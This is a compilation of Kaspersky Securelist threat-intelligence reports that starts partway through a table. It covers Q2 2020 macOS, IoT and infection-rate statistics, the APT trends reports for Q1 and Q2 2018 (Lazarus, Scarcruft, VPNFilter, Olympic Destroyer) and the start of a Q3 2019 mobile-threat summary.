2 | Trojan-Downloader.OSX.Shlayer.a | 12.07
3 | AdWare.OSX.Pirrit.j | 9.10
4 | AdWare.OSX.Bnodlero.at | 8.21
5 | AdWare.OSX.Cimpli.k | 7.32
6 | AdWare.OSX.Pirrit.o | 5.57
7 | Trojan-Downloader.OSX.Agent.h | 4.19
8 | AdWare.OSX.Ketin.h | 4.03
9 | AdWare.OSX.Pirrit.x | 4.00
10 | AdWare.OSX.Spc.a | 3.98
11 | AdWare.OSX.Amc.c | 3.97
12 | Backdoor.OSX.Lador.a | 3.91
13 | AdWare.OSX.Pirrit.v | 3.22
14 | RiskTool.OSX.Spigot.a | 2.89
15 | AdWare.OSX.Bnodlero.t | 2.87
16 | AdWare.OSX.Cimpli.f | 2.85
17 | AdWare.OSX.Adload.g | 2.60
18 | AdWare.OSX.Pirrit.aa | 2.54
19 | AdWare.OSX.MacSearch.d | 2.44
20 | AdWare.OSX.Adload.h | 2.35

_\* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._

The rankings of the most common threats for the macOS platform have not changed much compared to the previous quarter and are still largely made up of adware. As in Q1 2020, Shlayer (12.07%) was the most common Trojan.
That malware loads adware from the Pirrit, Bnodlero and Cimpli families, which populate our TOP 20.

The Lador.a backdoor, which we mentioned above, entered the rankings alongside the adware.

Finally, in Q2 2020, a group of potentially unwanted programs collectively detected as HistGrabber.b joined the rankings. The main purpose of such software is to unpack archives, but HistGrabber.b also quietly uploaded the user's browsing history to the developer's servers. This is [nothing new](<https://www.pcworld.com/article/3516502/report-avast-and-avg-collect-and-sell-your-personal-info-via-their-free-antivirus-programs.html>): all applications that steal browsing history have long been withdrawn from the App Store, and the servers that could receive the data have been disabled. Nevertheless, we deem it necessary to inform users of any such software discovered on their devices.

### Threat geography

_Threat geography for the macOS platform, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105816/25-en-malware_q2-2020_stats_non-mobile.png>))_

**TOP 10 countries**

| **Country**\* | **%**\*\*
---|---|---
1 | Spain | 9.82%
2 | France | 7.73%
3 | Mexico | 6.70%
4 | Italy | 6.54%
5 | India | 6.47%
6 | Canada | 6.34%
7 | Brazil | 6.25%
8 | USA | 5.99%
9 | United Kingdom | 5.90%
10 | Russia | 5.77%

_\* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 5,000)._
_\*\* Unique users attacked in the country as a percentage of all users of Kaspersky security solutions for macOS in the same country._

The most common threats in all the countries on the list, without exception, bundled various adware with the Shlayer Trojan.

## IoT attacks

### IoT threat statistics

Q2 2020 saw no dramatic change in cybercriminal activity targeting IoT devices: attackers most frequently ran Telnet login and password brute-force campaigns.

Service | %
---|---
Telnet | 80.83%
SSH | 19.17%

_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2020_

Further communication with IoT devices that pretended to be infected (and were actually traps) was much more often conducted via Telnet.

Service | %
---|---
Telnet | 71.52%
SSH | 28.48%

_Distribution of cybercriminals' working sessions with Kaspersky traps, Q2 2020_

_Geography of IP addresses of devices from which attacks on Kaspersky Telnet traps originated, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105906/26-en-malware_q2-2020_stats_non-mobile.png>))_

**TOP 10 countries by location of devices from which Telnet-based attacks were carried out on Kaspersky traps**

**Country** | **%**\*
---|---
China | 12.75%
Brazil | 11.88%
Egypt | 8.32%
Taiwan | 6.58%
Iran | 5.17%
India | 4.84%
Russia | 4.76%
Vietnam | 3.59%
Greece | 3.22%
USA | 2.94%

_\* Share of devices from which attacks were carried out in the country out of the total number of devices_

The three countries with the most devices that launched attacks on Kaspersky Telnet traps remained virtually unchanged.
China (12.75%) was first, while Brazil (11.88%) and Egypt (8.32%) swapped positions.

_Geography of IP addresses of devices from which attacks on Kaspersky SSH traps originated, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105939/27-en-malware_q2-2020_stats_non-mobile.png>))_

**TOP 10 countries by location of devices from which SSH-based attacks were carried out on Kaspersky traps**

**Country** | **%**\*
---|---
China | 22.12%
USA | 10.91%
Vietnam | 8.20%
Brazil | 5.34%
Germany | 4.68%
Russia | 4.44%
France | 3.42%
India | 3.01%
Egypt | 2.77%
Singapore | 2.59%

_\* Share of devices from which attacks were carried out in the country out of the total number of devices_

As with Telnet, the three countries where the most attacks on SSH traps originated remained unchanged from Q1 2020: China (22.12%), U.S. (10.91%) and Vietnam (8.20%).

### Threats loaded into traps

**Verdict** | **%**\*
---|---
Trojan-Downloader.Linux.NyaDrop.b | 32.78
Backdoor.Linux.Mirai.b | 17.47
HEUR:Backdoor.Linux.Mirai.b | 12.72
HEUR:Backdoor.Linux.Gafgyt.a | 9.76
Backdoor.Linux.Mirai.ba | 7.99
HEUR:Backdoor.Linux.Mirai.ba | 4.49
Backdoor.Linux.Gafgyt.bj | 2.23
HEUR:Trojan-Downloader.Shell.Agent.p | 1.66
Backdoor.Linux.Mirai.cn | 1.26
HEUR:Backdoor.Linux.Mirai.c | 0.73

_\* Share of the malware type in the total amount of malware downloaded to IoT devices following a successful attack._

As in the first quarter, the NyaDrop Trojan led by the number of loads onto traps. The Mirai Trojan family retained its relevance in Q2 2020, occupying half of our IoT threat rankings.

## Attacks via web resources

_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages._
_Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._

### Countries that are sources of web-based attacks: TOP 10

_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C2 centers, etc.). Any unique host could be the source of one or more web-based attacks._

_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._

In Q2 2020, Kaspersky solutions defeated 899,744,810 attacks launched from online resources located in 191 countries across the globe. A total of 286,229,445 unique URLs were recognized as malicious by Web Anti-Virus components.

_Distribution of web-based attack sources by country, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110037/28-en-malware_q2-2020_stats_non-mobile.png>))_

### Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the share of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter.
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious objects that fall under the **_Malware class_**; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| Country\* | % of attacked users\*\*
---|---|---
1 | Algeria | 11.2052
2 | Mongolia | 11.0337
3 | Albania | 9.8699
4 | France | 9.8668
5 | Tunisia | 9.6513
6 | Bulgaria | 9.5252
7 | Libya | 8.5995
8 | Morocco | 8.4784
9 | Greece | 8.3735
10 | Vietnam | 8.2298
11 | Somalia | 8.0938
12 | Georgia | 7.9888
13 | Malaysia | 7.9866
14 | Latvia | 7.8978
15 | UAE | 7.8675
16 | Qatar | 7.6820
17 | Angola | 7.5147
18 | Réunion | 7.4958
19 | Laos | 7.4757
20 | Mozambique | 7.4702

_\* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_\*\* Unique users targeted by **Malware-class** attacks as a share of all unique Kaspersky users in the country._

_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._

On average, 5.73% of Internet user computers worldwide experienced at least one **Malware-class** attack.

_Geography of malicious web-based attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110110/29-en-malware_q2-2020_stats_non-mobile.png>))_

## Local threats

_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products._
_It takes into account malicious programs that were found directly on users' computers or on removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs included in complex installers, encrypted files, etc.)._

In Q2 2020, our File Anti-Virus detected **80,993,511** malware and potentially unwanted objects.

### Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| Country\* | % of attacked users\*\*
---|---|---
1 | Turkmenistan | 48.0224
2 | Uzbekistan | 42.2632
3 | Tajikistan | 42.1279
4 | Ethiopia | 41.7213
5 | Afghanistan | 40.6278
6 | Myanmar | 39.1377
7 | Burkina Faso | 37.4560
8 | Benin | 37.4390
9 | China | 36.7346
10 | Kyrgyzstan | 36.0847
11 | Vietnam | 35.4327
12 | Mauritania | 34.2613
13 | Laos | 34.0350
14 | Mongolia | 33.6261
15 | Burundi | 33.4323
16 | Belarus | 33.0937
17 | Guinea | 33.0097
18 | Mali | 32.9902
19 | Togo | 32.6962
20 | Cameroon | 32.6347

_\* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_\*\* Unique users on whose computers **Malware-class** local threats were blocked, as a share of all unique users of Kaspersky products in the country._

_Geography of local infection attempts, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110144/30-en-malware_q2-2020_stats_non-mobile.png>))_

Overall, 17.05% of user computers globally faced at least one **Malware-class** local threat during Q2 2020.

_Source: "IT threat evolution Q2 2020. PC statistics", Securelist, published 2020-09-03, [securelist.com](<https://securelist.com/it-threat-evolution-q2-2020-pc-statistics/98292/>). CVEs referenced: CVE-2017-0199, CVE-2017-11882, CVE-2017-8570, CVE-2017-8759, CVE-2018-0802, CVE-2020-0796, CVE-2020-1206, CVE-2020-1299, CVE-2020-1300, CVE-2020-1301, CVE-2020-1425, CVE-2020-1457, CVE-2020-6819, CVE-2020-6820._

# APT Trends Report Q2 2018

In the second quarter of 2017, Kaspersky Lab's Global Research and Analysis Team (GReAT) began publishing summaries of the quarter's private threat intelligence reports, in an effort to make the public aware of the research we have been conducting. This report serves as the latest installment, focusing on the relevant activities that we observed during Q2 2018.

These summaries are a representative snapshot of what has been discussed in greater detail in our private reports. They aim to highlight the significant events and findings that we feel people should be aware of. For brevity's sake, we are choosing not to publish indicators associated with the reports highlighted.
However, readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).

## **Remarkable new findings**

We are always interested in analyzing new techniques used by existing groups, or in finding new clusters of activity that might lead us to discover new actors. Q2 2018 was very interesting in terms of APT activity, with a remarkable campaign that reminds us how real some of the threats are that we have been predicting over the last few years. In particular, we have warned repeatedly how ideal networking hardware is for targeted attacks, and that we had started seeing the first advanced sets of activity focusing on these devices.

In terms of well-known groups, **Asian actors** were the most active by far.

Lazarus/BlueNoroff [was suspected](<https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/>) of targeting financial institutions in Turkey as part of a bigger cyberespionage campaign. The same actor was also suspected of a [campaign against an online casino](<https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/>) in Latin America that ended in a destructive attack. Based on our telemetry, we further observed Lazarus targeting financial institutions in Asia. Lazarus has accumulated a large collection of artefacts over the last few years, in some cases with heavy code reuse, which makes it possible to link many newly found sets of activity to this actor. One such tool is the Manuscrypt malware, used exclusively by Lazarus in many recent attacks.
The US-CERT released a [warning](<https://www.us-cert.gov/ncas/analysis-reports/AR18-165A>) in June about a new version of Manuscrypt they call TYPEFRAME.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/09154452/180709-APT-Trends-report-Q2-2018-1.png>)

_US-CERT alert on Manuscrypt/TYPEFRAME malware used by Lazarus_

Even if it is unclear what the role of Lazarus will be in the new geopolitical landscape, where North Korea is actively engaged in peace talks, it would appear that financially motivated activity (through the BlueNoroff and, in some cases, the Andariel subgroup) continues unabated.

Possibly even more interesting is the relatively intense activity by Scarcruft, also known as Group123 and Reaper. Back in January, Scarcruft [was found](<https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998>) using a zero-day exploit, CVE-2018-4878, to target South Korea, a sign that the group's capabilities were increasing. In the last few months, the use of Android malware by this actor has been discovered, as well as a new campaign in which it spreads a new backdoor we call POORWEB. Initially, there was suspicion that Scarcruft was also behind the CVE-2018-8174 zero-day [announced](<http://blogs.360.cn/blog/cve-2018-8174-en/>) by Qihoo360. We were later able to confirm that the zero-day was actually distributed by a different APT group, known as [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>).

The overlaps between Scarcruft and DarkHotel go back to 2016, when we [discovered](<https://securelist.com/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/75082/>) Operation Daybreak and Operation Erebus. In both cases, attacks leveraged the same hacked website to distribute exploits, one of which was a zero-day.
We were later able to separate these as follows:

Operation | Exploit | Actor
---|---|---
Daybreak | CVE-2016-4171 | DarkHotel
Erebus | CVE-2016-4117 | Scarcruft

DarkHotel's Operation Daybreak relied on spear-phishing emails predominantly targeting Chinese victims with a Flash Player zero-day. Meanwhile, Scarcruft's Operation Erebus focused primarily on South Korea.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/09154503/180709-APT-Trends-report-Q2-2018-2.png>)

Analysis of the CVE-2018-8174 exploit used by DarkHotel revealed that the attacker [was using URLMoniker](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>) to invoke Internet Explorer through Microsoft Word, ignoring any default browser preferences on the victim's computer. This is the first time we have observed this. It is an interesting technique that we believe may be reused in future for different attacks. For more details, see our Securelist blog post "[The King is Dead. Long Live the King!](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>)".

We also observed some relatively quiet groups coming back with new activity. A noteworthy example is [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>) (also known as APT27 and Emissary Panda), which abused ISPs in Asia for waterhole attacks on high-profile websites. We wrote about LuckyMouse targeting national data centers in June. We also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China.

Still, the most notable activity during this quarter is the VPNFilter campaign, attributed by the FBI to the Sofacy and Sandworm (Black Energy) APT groups. The campaign targeted a large array of domestic networking hardware and storage solutions.
It is even able to inject malware into traffic in order to infect computers behind the infected networking device. We have provided an [analysis](<https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/>) of the EXIF-to-C2 mechanism used by this malware.

This campaign is one of the most relevant examples we have seen of how networking hardware has become a priority for sophisticated attackers. The data provided by our colleagues at Cisco Talos indicates this campaign was at a truly global level. We can confirm with our own analysis that traces of this campaign can be found in almost every country.

## **Activity of well-known groups**

It seems that some of the most active groups of the last few years have reduced their activity, although this does not mean they are less dangerous. For instance, it was publicly reported that Sofacy started using new, freely available modules as last-stage payloads for some victims. However, we observed how this provided yet another innovation for their arsenal, with the addition of new downloaders written in the Go programming language to distribute Zebrocy.

There is possibly one notable exception to this supposed lack of activity. After the Olympic Destroyer campaign last January against the Pyeongchang Winter Olympic Games, we [observed](<https://securelist.com/olympic-destroyer-is-still-alive/86169/>) new suspected activity by the same actor (we tentatively called them Hades) in Europe. This time, it seems the targets are financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/09154509/180709-APT-Trends-report-Q2-2018-3.png>)

But even more interesting is the resemblance between the TTPs and OPSEC of the Olympic Destroyer set of activity and those of Sofacy.
Olympic Destroyer is a master of deception, so this may be yet another false flag, but so far we connect, with low to medium confidence, the Hades group activity to Sofacy.

One of the most interesting attacks we detected was an implant from Turla (attributed to this actor with medium confidence) that we call LightNeuron. This new artefact directly targets Exchange Servers and uses legitimate standard calls to intercept emails, exfiltrate data and even send mails on behalf of the victims. We believe this actor has been using this technique since maybe as early as 2014, and that there is a version affecting Unix servers running Postfix and Sendmail. So far we have seen victims of this implant in the Middle East and Central Asia.

## **Newcomers and comebacks**

Every now and then, we are surprised to see old actors that have been dormant for months or even years distributing new malware. Obviously, this may be caused by a lack of visibility, but regardless of that, it indicates that these actors are still active.

One good example would be WhiteWhale, an actor that has been extremely quiet since 2016. We detected a new campaign last April where the actor was distributing both the Taidoor and Yalink malware families. This activity was almost exclusively targeting Japanese entities.

Following the intense diplomatic activity around the North Korea peace talks and the subsequent summit with the U.S. president in Singapore, Kimsuky decided to take advantage of this theme to distribute its malware in a new campaign. A massive update to its arsenal in late 2017 and early 2018 was mobilized in a new wave of spear-phishing emails.

We also discovered a new low-sophistication set of activity we call Perfanly, which we couldn't attribute to any known actor. It has been targeting governmental entities in Malaysia and Indonesia since at least 2017.
It uses custom multistage droppers as well as freely available tools such as Metasploit.

Between June and July, we observed a battery of attacks against various institutions in Kuwait. These attacks leverage Microsoft Office documents with macros, which drop a combination of VBS and PowerShell scripts using DNS for command and control. We have observed similar activity in the past from groups such as Oilrig and Stonedrill, which leads us to believe the new attacks could be connected, though for now that connection is only assessed as low confidence.

## **Final thoughts**

The combination of simple custom artefacts designed mainly to evade detection with publicly available tools for later stages seems to be a well-established trend for certain sets of activity, like the ones found under the 'Chinese-speaking umbrella', as well as for many newcomers who find the entry barrier into APT cyberespionage activity non-existent.

The intermittent activity by many actors simply indicates they were never out of business. They might take small breaks to reorganize themselves, or to perform small operations that might go undetected on a global scale. Probably one of the most interesting cases is LuckyMouse, with aggressive new activity heavily related to the geopolitical agenda in Asia. It is impossible to know if there is any coordination with other actors who resurfaced in the region, but this is a possibility.

One interesting aspect is the high level of activity by Chinese-speaking actors against Mongolian entities over the last 10 months. This might be related to several summits between Asian countries – some related to new relations with North Korea – held in Mongolia, and to the country's new role in the region.

There were also several alerts from NCSC and US-CERT regarding Energetic Bear/Crouching Yeti activity.
Even if it is not very clear how active this actor might be at the moment (the alerts basically warned about past incidents), it should be considered a dangerous, active and pragmatic actor very focused on certain industries. We recommend checking [our latest analysis](<https://securelist.com/energetic-bear-crouching-yeti/85345/>) on Securelist, because the way this actor uses hacked infrastructure can create a lot of collateral victims.

To recap, we would like to emphasize just how important networking hardware has become for advanced attackers. We have seen various examples during recent months, and VPNFilter should be a wake-up call for those who didn't believe this was an important issue.

We will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more, please reach out to us at intelreports@kaspersky.com.

_Source: "APT Trends Report Q2 2018", Securelist, published 2018-07-10, [securelist.com](<https://securelist.com/apt-trends-report-q2-2018/86487/>). CVEs referenced: CVE-2016-4117, CVE-2016-4171, CVE-2018-4878, CVE-2018-8174._

In the second quarter of 2017, Kaspersky's Global Research and Analysis Team (GReAT) began publishing summaries of the quarter's private threat intelligence reports in an effort to make the public aware of the research we have been conducting.
This report serves as the next installment, focusing on the relevant activities that we observed during Q1 2018.

These summaries serve as a representative snapshot of what has been discussed in greater detail in our private reports, in order to highlight the significant events and findings that we feel people should be aware of. For brevity's sake, we are choosing not to publish indicators associated with the reports highlighted. However, if you would like to learn more about our intelligence reports or request more information on a specific report, readers are encouraged to contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).

## **Remarkable new findings**

We are always very interested in analyzing new techniques used by existing groups, or in finding new clusters of activity that might lead us to discover new actors. In Q1 2018 we observed a bit of both, which are briefly summarized in this section.

We would like to start by highlighting all the new exploitation techniques applicable to the Meltdown/Spectre vulnerabilities that affect different CPU architectures and vendors. Even though we haven't seen any of them exploited in the wild so far (only several PoCs), and although vendors have provided various patches to mitigate them, there is still no real solution. The problem lies in the optimization methods used at the processor architecture level. Given that a massive hardware replacement is not a realistic solution, Meltdown and Spectre might very well open the door to new infection vectors and persistence methods that we will see in the future.

A similar case was the announcement of several flaws in AMD processors.
Even though the full technical details were not yet available, AMD confirmed that these flaws could be exploited for privilege escalation and persistence once a target has been compromised.

We also observed an increasing interest from attackers, including sophisticated actors, in targeting routers and networking hardware. Some early examples of such attacks driven by advanced groups include Regin and CloudAtlas. Additionally, the US Government published an advisory on unusual reboots in a prominent router brand, which might indicate that these specific devices are being actively targeted.

In our Slingshot analysis, we described how the campaign was using MikroTik routers as an infection vector, compromising the routers to later infect the final victim through the very peculiar mechanism that MikroTik used for the remote management of devices. In actual fact, we recognised the interest of some actors in this particular brand when the Chimay-red exploit for MikroTik was mentioned in WikiLeaks' Vault7. This same exploit was later reused by the Hajime botnet in 2018, showing once again how dangerous leaked exploits can be. Even though the vulnerability was fixed by MikroTik, networking hardware is rarely managed properly from a security perspective. Additionally, MikroTik reported a zero-day vulnerability ([CVE-2018-7445](<https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow>)) in March 2018.

We believe routers are still an excellent target for attackers, as demonstrated by the examples above, and will continue to be abused in order to get a foothold in the victim's infrastructure.

One of the most relevant attacks during this first quarter of 2018 was the Olympic Destroyer malware, affecting several companies related to the Pyeongchang Olympic Games' organization and some Olympic facilities.
There are different aspects of this attack to highlight, including the fact that attackers compromised companies that were providing services to the games' organization in order to gain access, continuing the dangerous supply chain trend.

Besides the technical considerations, one of the more open questions relates to the general perception that attackers could have done much more harm than they actually did, which prompted some speculation as to what the real purpose of the attack was.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/11130221/180411-2018-Q1-APT-activity-1.png>)

**_MZ DOS and Rich headers of both files (3c0d740347b0362331c882c2dee96dbf – OlympicDestroyer, 5d0ffbc8389f27b0649696f0ef5b3cfe – Bluenoroff) are exactly the same._**

In addition, a very relevant aspect is the effort attackers put into planting several elaborate false flags, making this attack one of the most difficult we have analyzed in terms of attribution.

In February, we published a report about a previously unknown advanced Android backdoor that we call Skygofree. It seems that the author could be an Italian company selling the product in a similar way to how Hacking Team did in the past; however, we don't yet have any proof of this. Interestingly, shortly after we detected the Android samples of this malware, we also found an early iOS version of the backdoor. In this case, attackers had abused a rogue MDM (Mobile Device Management) server in order to install their malware on victims' devices, probably using social engineering techniques to trick them into connecting to the rogue MDM.

Finally, we would like to highlight three new actors that we have found, all of them focused on the Asia region:

 * Shaggypanther – A Chinese-speaking cluster of activity targeting government entities, mainly in Taiwan and Malaysia, active since 2008 and using hidden encrypted payloads in registry keys.
We couldn't relate this to any known actor.
 * Sidewinder – An actor mainly targeting Pakistani military targets, active since at least 2012. We have low confidence that this malware might be authored by an Indian company. To spread the malware, they use unique implementations to leverage exploits for known vulnerabilities (such as CVE-2017-11882) and later deploy a PowerShell payload in the final stages.
 * CardinalLizard – We are moderately confident that this is a new collection of Chinese-speaking activity targeting businesses, active since 2014. Over the last few years, the group has shown an interest in the Philippines, Russia, Mongolia and Malaysia, the latter especially prevalent during 2018. The hackers use a custom malware featuring some interesting anti-detection and anti-emulation techniques. The infrastructure used also shows some overlaps with RoamingTiger and previous PlugX campaigns, but this could just be due to infrastructure reuse under the Chinese-speaking umbrella.

## **Activity of well-known groups**

Some of the most heavily tracked groups, especially those that are Russian-speaking, didn't show any remarkable activity during the last three months, as far as we know.

We observed limited activity from Sofacy in distributing Gamefish, updating its Zebrocy toolset and potentially registering new domains that might be used for future campaigns. We also saw the group slowly shift its targeting to Asia over the last few months.

In the case of Turla (Snake, Uroburos), the group was suspected of breaching the German governmental networks, according to some reports.
The breach was originally reported as Sofacy, but since then no additional technical details or official confirmation have been provided.

The apparent low activity of these groups - and some others such as The Dukes - could be related to some kind of internal reorganization; however, this is purely speculative.

## **Asia - high activity**

The ever-growing APT activity in this part of the world shouldn't be a surprise, especially seeing as the Winter Olympic Games were hosted in South Korea in January 2018. More than 30% of our 27 reports during Q1 were focused on the region.

Probably one of the most interesting activities relates to [Kimsuky](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/>), an actor with a North Korean nexus interested in South Korean think tanks and political activities. The actor renewed its arsenal with a completely new framework designed for cyberespionage, which was used in a spear-phishing campaign against South Korean targets, similar to the one targeting [KHNP](<http://h21.hani.co.kr/arti/economy/economy_general/38919.html>) in 2014. According to McAfee, this activity was related to attacks against companies involved in the organization of the Pyeongchang Olympic Games; however, we cannot confirm this.

The Korean focus continues with our analysis of the Flash Player 0-day vulnerability (CVE-2018-4878), deployed by Scarcruft at the end of January and triggered by Microsoft Word documents distributed through at least one website. This vulnerability was quickly reported by the Korean CERT (KN-CERT), which we believe helped to quickly mitigate any aggressive spreading.
At the time of our analysis, we could only detect one victim in South Africa.

[(image)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/11130229/180411-2018-Q1-APT-activity-2.png>)

_Forgotten PDB path inside the malware used by Scarcruft with CVE-2018-4876_

Furthermore, IronHusky is a Chinese-speaking actor that we first detected in summer 2017. It is very focused on tracking the geopolitical agenda of targets in Central Asia, with a special focus on Mongolia, which seems to be an unusual target. This actor crafts campaigns for upcoming events of interest. In this case, they prepared and launched one right before a meeting between the International Monetary Fund and the Mongolian government at the end of January 2018. At the same time, they stopped their previous operations targeting Russian military contractors, which speaks volumes about the group's limitations. In this new campaign, they exploited CVE-2017-11882 to spread common RATs typically used by Chinese-speaking groups, such as PlugX and PoisonIvy.

The final remark for this section covers the apparently never-ending greed of BlueNoroff, which has been moving to new targets among cryptocurrency companies and expanding its operations to target PoS systems. However, we haven't observed any new remarkable changes in the modus operandi of the group.

## **Middle East - always under pressure**

There was a remarkable peak in StrongPity's activity at the beginning of the year, both in January and March. For this new wave of attacks, the group used a new version of its malware that we simply call StrongPity2. However, the most remarkable aspect is the use of MiTM techniques at the ISP level to spread the malware, redirecting legitimate downloads to their artifacts.
The group combines this method with registering domains that are similar to the ones used for downloading legitimate software.

StrongPity also distributed FinFisher using the same MiTM method at the ISP level, more details of which were provided by CitizenLab.

Desert Falcons showed a peak of activity at the end of 2017 and the beginning of 2018. Their toolset for this new campaign included Android implants that they had previously used back in 2014. The group continues to rely heavily on social engineering methods for malware distribution, and uses rudimentary artifacts for infecting its victims. In this new wave we observed high-profile victims based mostly in Palestine, Egypt, Jordan, Israel, Lebanon and Turkey.

A particularly interesting case we analyzed was the evolution of what we believe to be the Gaza Team actor. What makes us question whether this is the same actor that we have tracked in the past is the fact that we observed a remarkable boost in the artifacts used by the group. We actually can't be sure whether the group suddenly developed these new technical capabilities, or if they had some internal reorganization or acquired improved tools. Another possibility is that the group itself was somehow hacked and a third actor is now distributing their artifacts through them.

## **Final Thoughts**

As a summary of what happened during the last 3 months, we have the impression that some well-known actors are rethinking their strategies and reorganizing their teams for future attacks. In addition, a whole new wave of attackers is becoming much more active. For all these new attackers we observe different levels of sophistication, but let's admit that the entry barrier for cyberespionage is much lower than it used to be in terms of the availability of different tools that can be used for malicious activities. PowerShell, for instance, is one of the most common resources used by any of them.
In other cases, there seems to be a flourishing industry of malware development behind the authorship of the tools that have been used in several campaigns.

Some of the big stories like Olympic Destroyer teach us what kind of difficulties we will likely find in the future in terms of attribution, while also illustrating how effective supply chain attacks still are. Speaking of new infection vectors, some of the CPU vulnerabilities discovered in the last few months will open new possibilities for attackers; unfortunately there is not an easy, universal protection mechanism for all of them. Routing hardware is already an infection vector for some actors, which should make us think about whether we are following all the best practices in protecting such devices.

We will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more please reach out to us at intelreports@kaspersky.com.

_Source: Securelist, "APT Trends report Q1 2018", published 2018-04-12, <https://securelist.com/apt-trends-report-q1-2018/85280/>. CVEs referenced: CVE-2017-11882, CVE-2018-4876, CVE-2018-4878, CVE-2018-7445._

_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._

## Quarterly figures

According to Kaspersky Security Network:

 * Kaspersky solutions blocked 989,432,403 attacks launched from online resources in 203 countries across the globe.
 * 560,025,316 unique URLs were recognized as malicious by Web Anti-Virus components.
 * Attempted infections by malware designed to steal money via online
access to bank accounts were blocked on the computers of 197,559 users.
 * Ransomware attacks were defeated on the computers of 229,643 unique users.
 * Our File Anti-Virus detected 230,051,054 unique malicious and potentially unwanted objects.
 * Kaspersky products for mobile devices detected:
   * 870,617 malicious installation packages
   * 13,129 installation packages for mobile banking Trojans
   * 13,179 installation packages for mobile ransomware Trojans

## Mobile threats

### Quarterly highlights

In Q3 2019, we discovered an extremely [unpleasant incident](<https://securelist.com/dropper-in-google-play/92496/>) with the popular CamScanner app on Google Play. The new version of the app contained an ad library with the Trojan dropper Necro built in. Judging by the reviews on Google Play, the dropper's task was to activate paid subscriptions, although it could deliver another payload if required.

[(image)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171243/malware-q3-2019-statistics-en-1.png>)

Another interesting Trojan detected in Q3 2019 is Trojan.AndroidOS.Agent.vn. Its main function is to "like" Facebook posts when instructed by its handlers. Interestingly, to make the click, the Trojan attacks the Facebook mobile app on the infected device, literally forcing it to execute its command.

In the same quarter, we discovered [new FinSpy spyware Trojans](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>) for iOS and Android. In the fresh versions, the focus is on snooping on correspondence in messaging apps.
The iOS version requires a [jailbreak](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) to do its job, while the Android version is able to spy on the encrypted Threema app, among others.

### Mobile threat statistics

In Q3 2019, Kaspersky detected 870,617 malicious installation packages.

_Number of detected malicious installation packages, Q4 2018 – Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171249/malware-q3-2019-statistics-en-2.png>)

Whereas in previous quarters we observed a noticeable drop in the number of new installation packages, Q3's figure was up by 117,067 packages compared to the previous quarter.

### Distribution of detected mobile apps by type

_Distribution of detected mobile apps by type, Q2 and Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/29125517/malware-q3-2019-statistics-en-3.png>)

